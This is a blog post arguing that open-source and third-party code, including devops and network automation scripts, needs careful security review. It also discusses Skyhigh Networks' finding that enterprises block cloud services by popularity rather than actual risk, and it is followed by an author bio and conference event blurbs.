Welcome!

@CloudExpo Authors: Liz McMillan, Elizabeth White, Pat Romanski, Yeshim Deniz, Aruna Ravichandran

Related Topics: @CloudExpo, Microservices Expo, Open Source Cloud, Containers Expo Blog, Cloud Security, SDN Journal

@CloudExpo: Blog Feed Post

Code from the Cloud: Are You Getting More Than You Bargained For?

Data from Skyhigh reveals that popularity, not risk, will get you blocked, leaving some of the riskiest services available

It was at my very first job as a developer that I learned about code reviews (and that I intuitively hated them, a characteristic I share with many developers I've then since learned). We wrote and maintained software that automated tax preparation (yes, you may in fact be using services that contain code I touched long ago - caveat emptor ;-)) and going over code was an important part of the process. In addition to making sure we were following coding standards with respect to source formatting there was also the opportunity for improvements and to find potential mistakes that might be disastrous given the nature of the software we developed.

Fast forward a number of years (right, like I was going to tell you how many) and code reviews are still a part of the development process. The thing is that the reasons for reviewing source code have expanded, primarily thanks to the success of open source.

It goes without saying (but I'll say it anyway) that the practice of "code reviews" needs to expand in terms of groups who conduct them, as well, as "code" moves out of the walled application development garden and spills out into devops and networking teams as well.

Yes, as a matter of fact, those Chef recipes and PERL and Python scripts are a kind of code. As are the OpenStack packages you downloaded, and that OSS SDN controller just as surely as that node.js package - Restify - that an application developer grabbed is code. Given the rising importance of automation and orchestration to realize continuous delivery and improve network service velocity, scripts and code that drive such systems should be carefully reviewed to ensure a simple mistake (ever misplace a semi-colon in an if statement? Hmmm?) does not lead to disastrous downtime or disruption.

It needs to be reviewed. Carefully. Not necessarily for style, but for substance. Not only because it coding errors can lead to downtime and disruption, but because code acquired from third-party services are ripe for exploitation by the omnipresent "bad guys" looking for an opportunity to inject malware into an organization for fun and/or profit, no matter what use the code is intended to serve.

If you think that's fanciful paranoia - think again. As Skyhigh Networks points out in their first annual Cloud Adoption & Risk Report, code sharing services have, in fact, seen compromise in recent years. Some of us will recall, of course, similar issues with tainted Linux RPMs many (more) years ago.

code-sharing-compromises

It's unrealistic to believe that every code review of OSS acquired code will find a risk - even if they exist. Hundreds of thousands - to millions - of lines of code are shared and wind up included in software every day. That's a lot of code to review. But someone should take a look through it - whether using automated static analysis tools (even I can write a grep statement to scan for the use of sockets and files and the like to point out potential areas in need of closer examination) or manual evaluation.

And it shouldn't matter whether the code was acquired for inclusion in a web application, in devops, or for automating the network. Code is code, it should be reviewed with an eye toward the very real risk it presents to the organization.

The same goes for the other risky services Skyhigh found prevalent in just about every organization across its report. With 3,000,000 users of cloud services included, its findings are not ones you should ignore.

Popularity Trumps Risk

The best way to sum up Skyhigh's findings is that popularity trumps actual risk. For a significant portion of organizations, the popularity - and thus awareness of - cloud services is what gets you banned from crossing the data center firewall. They are, according to Skyhigh, blocking services based on (perceived0 productivity loss - not risk.

Granted, productivity loss is a risk - a business risk - but that kind of risk can often be managed better through behavioral management techniques, not technological ones.

The bigger problem is not the blocking of popular social media and cloud service sites, but the reasons why they come to the attention of policy makers that lay down the blocking law in the first place. It's all about popularity, about awareness.

Cloud services today are primarily blocked based on the almost certain probability that because a service is well known and our firewall logs show connections to those sites in our Top Ten Eye Candy Report, it's cutting into our time. Thus it is blocked.

Those sites that don't appear in the Top Ten (or even Top Twenty) but carry with them even more risk (because they are less well used and likely less mature in terms of security and addressing enterprise concerns) are left available to corporate users.

This is evident as you peruse Skyhigh's Report, with sites like DropBox blocked on a regular basis but up and coming Rapidgator? It's barely noticed, despite its higher risk rating. GitHub? Blocked 21 percent of the time but high-risk service Codehaus?  Blocked only 1% of the time. Because it's not got the mindshare and popularity of Github. But it only takes one user, after all, to use a risky service and unintentionally introduce malware or malicious code to take out a corporate network.

That's why visibility - awareness - is so important. It's critical to ensuring that third-party source as well as services used, accessed, and acquired from the cloud is acceptable for use within an organization. Skyhigh claims that cloud service usage is at least 10 times higher than actually believed within organizations. Its data certainly appears to back that up.

Whether it's understanding what services - and what risks they pose - or what code is being included in applications, visibility is the key to being able to set policies that address real risks, rather than those inferred by popularity.

You can find Skyhigh Networks' report here - I definitely suggest a read through, it's eye-opening stuff.

More Stories By Lori MacVittie

Lori MacVittie is responsible for education and evangelism of application services available across F5’s entire product suite. Her role includes authorship of technical materials and participation in a number of community-based forums and industry standards organizations, among other efforts. MacVittie has extensive programming experience as an application architect, as well as network and systems development and administration expertise. Prior to joining F5, MacVittie was an award-winning Senior Technology Editor at Network Computing Magazine, where she conducted product research and evaluation focused on integration with application and network architectures, and authored articles on a variety of topics aimed at IT professionals. Her most recent area of focus included SOA-related products and architectures. She holds a B.S. in Information and Computing Science from the University of Wisconsin at Green Bay, and an M.S. in Computer Science from Nova Southeastern University.

@CloudExpo Stories
First generation hyperconverged solutions have taken the data center by storm, rapidly proliferating in pockets everywhere to provide further consolidation of floor space and workloads. These first generation solutions are not without challenges, however. In his session at 21st Cloud Expo, Wes Talbert, a Principal Architect and results-driven enterprise sales leader at NetApp, will discuss how the HCI solution of tomorrow will integrate with the public cloud to deliver a quality hybrid cloud e...
Is advanced scheduling in Kubernetes achievable? Yes, however, how do you properly accommodate every real-life scenario that a Kubernetes user might encounter? How do you leverage advanced scheduling techniques to shape and describe each scenario in easy-to-use rules and configurations? In his session at @DevOpsSummit at 21st Cloud Expo, Oleg Chunikhin, CTO at Kublr, will answer these questions and demonstrate techniques for implementing advanced scheduling. For example, using spot instances ...
SYS-CON Events announced today that Yuasa System will exhibit at the Japan External Trade Organization (JETRO) Pavilion at SYS-CON's 21st International Cloud Expo®, which will take place on Oct 31 – Nov 2, 2017, at the Santa Clara Convention Center in Santa Clara, CA. Yuasa System is introducing a multi-purpose endurance testing system for flexible displays, OLED devices, flexible substrates, flat cables, and films in smartphones, wearables, automobiles, and healthcare.
SYS-CON Events announced today that Taica will exhibit at the Japan External Trade Organization (JETRO) Pavilion at SYS-CON's 21st International Cloud Expo®, which will take place on Oct 31 – Nov 2, 2017, at the Santa Clara Convention Center in Santa Clara, CA. Taica manufacturers Alpha-GEL brand silicone components and materials, which maintain outstanding performance over a wide temperature range -40C to +200C. For more information, visit http://www.taica.co.jp/english/.
As hybrid cloud becomes the de-facto standard mode of operation for most enterprises, new challenges arise on how to efficiently and economically share data across environments. In his session at 21st Cloud Expo, Dr. Allon Cohen, VP of Product at Elastifile, will explore new techniques and best practices that help enterprise IT benefit from the advantages of hybrid cloud environments by enabling data availability for both legacy enterprise and cloud-native mission critical applications. By rev...
When it comes to cloud computing, the ability to turn massive amounts of compute cores on and off on demand sounds attractive to IT staff, who need to manage peaks and valleys in user activity. With cloud bursting, the majority of the data can stay on premises while tapping into compute from public cloud providers, reducing risk and minimizing need to move large files. In his session at 18th Cloud Expo, Scott Jeschonek, Director of Product Management at Avere Systems, discussed the IT and busine...
Organizations do not need a Big Data strategy; they need a business strategy that incorporates Big Data. Most organizations lack a road map for using Big Data to optimize key business processes, deliver a differentiated customer experience, or uncover new business opportunities. They do not understand what’s possible with respect to integrating Big Data into the business model.
Companies are harnessing data in ways we once associated with science fiction. Analysts have access to a plethora of visualization and reporting tools, but considering the vast amount of data businesses collect and limitations of CPUs, end users are forced to design their structures and systems with limitations. Until now. As the cloud toolkit to analyze data has evolved, GPUs have stepped in to massively parallel SQL, visualization and machine learning.
Recently, REAN Cloud built a digital concierge for a North Carolina hospital that had observed that most patient call button questions were repetitive. In addition, the paper-based process used to measure patient health metrics was laborious, not in real-time and sometimes error-prone. In their session at 21st Cloud Expo, Sean Finnerty, Executive Director, Practice Lead, Health Care & Life Science at REAN Cloud, and Dr. S.P.T. Krishnan, Principal Architect at REAN Cloud, will discuss how they b...
Enterprises have taken advantage of IoT to achieve important revenue and cost advantages. What is less apparent is how incumbent enterprises operating at scale have, following success with IoT, built analytic, operations management and software development capabilities – ranging from autonomous vehicles to manageable robotics installations. They have embraced these capabilities as if they were Silicon Valley startups. As a result, many firms employ new business models that place enormous impor...
The next XaaS is CICDaaS. Why? Because CICD saves developers a huge amount of time. CD is an especially great option for projects that require multiple and frequent contributions to be integrated. But… securing CICD best practices is an emerging, essential, yet little understood practice for DevOps teams and their Cloud Service Providers. The only way to get CICD to work in a highly secure environment takes collaboration, patience and persistence. Building CICD in the cloud requires rigorous a...
Data scientists must access high-performance computing resources across a wide-area network. To achieve cloud-based HPC visualization, researchers must transfer datasets and visualization results efficiently. HPC clusters now compute GPU-accelerated visualization in the cloud cluster. To efficiently display results remotely, a high-performance, low-latency protocol transfers the display from the cluster to a remote desktop. Further, tools to easily mount remote datasets and efficiently transfer...
SYS-CON Events announced today that Dasher Technologies will exhibit at SYS-CON's 21st International Cloud Expo®, which will take place on Oct 31 - Nov 2, 2017, at the Santa Clara Convention Center in Santa Clara, CA. Dasher Technologies, Inc. ® is a premier IT solution provider that delivers expert technical resources along with trusted account executives to architect and deliver complete IT solutions and services to help our clients execute their goals, plans and objectives. Since 1999, we'v...
SYS-CON Events announced today that MIRAI Inc. will exhibit at the Japan External Trade Organization (JETRO) Pavilion at SYS-CON's 21st International Cloud Expo®, which will take place on Oct 31 – Nov 2, 2017, at the Santa Clara Convention Center in Santa Clara, CA. MIRAI Inc. are IT consultants from the public sector whose mission is to solve social issues by technology and innovation and to create a meaningful future for people.
In his session at 21st Cloud Expo, Raju Shreewastava, founder of Big Data Trunk, will provide a fun and simple way to introduce Machine Leaning to anyone and everyone. Together we will solve a machine learning problem and find an easy way to be able to do machine learning without even coding. Raju Shreewastava is the founder of Big Data Trunk (www.BigDataTrunk.com), a Big Data Training and consulting firm with offices in the United States. He previously led the data warehouse/business intellige...
SYS-CON Events announced today that TidalScale, a leading provider of systems and services, will exhibit at SYS-CON's 21st International Cloud Expo®, which will take place on Oct 31 - Nov 2, 2017, at the Santa Clara Convention Center in Santa Clara, CA. TidalScale has been involved in shaping the computing landscape. They've designed, developed and deployed some of the most important and successful systems and services in the history of the computing industry - internet, Ethernet, operating s...
SYS-CON Events announced today that TidalScale will exhibit at SYS-CON's 21st International Cloud Expo®, which will take place on Oct 31 – Nov 2, 2017, at the Santa Clara Convention Center in Santa Clara, CA. TidalScale is the leading provider of Software-Defined Servers that bring flexibility to modern data centers by right-sizing servers on the fly to fit any data set or workload. TidalScale’s award-winning inverse hypervisor technology combines multiple commodity servers (including their ass...
Gemini is Yahoo’s native and search advertising platform. To ensure the quality of a complex distributed system that spans multiple products and components and across various desktop websites and mobile app and web experiences – both Yahoo owned and operated and third-party syndication (supply), with complex interaction with more than a billion users and numerous advertisers globally (demand) – it becomes imperative to automate a set of end-to-end tests 24x7 to detect bugs and regression. In th...
Amazon is pursuing new markets and disrupting industries at an incredible pace. Almost every industry seems to be in its crosshairs. Companies and industries that once thought they were safe are now worried about being “Amazoned.”. The new watch word should be “Be afraid. Be very afraid.” In his session 21st Cloud Expo, Chris Kocher, a co-founder of Grey Heron, will address questions such as: What new areas is Amazon disrupting? How are they doing this? Where are they likely to go? What are th...
SYS-CON Events announced today that IBM has been named “Diamond Sponsor” of SYS-CON's 21st Cloud Expo, which will take place on October 31 through November 2nd 2017 at the Santa Clara Convention Center in Santa Clara, California.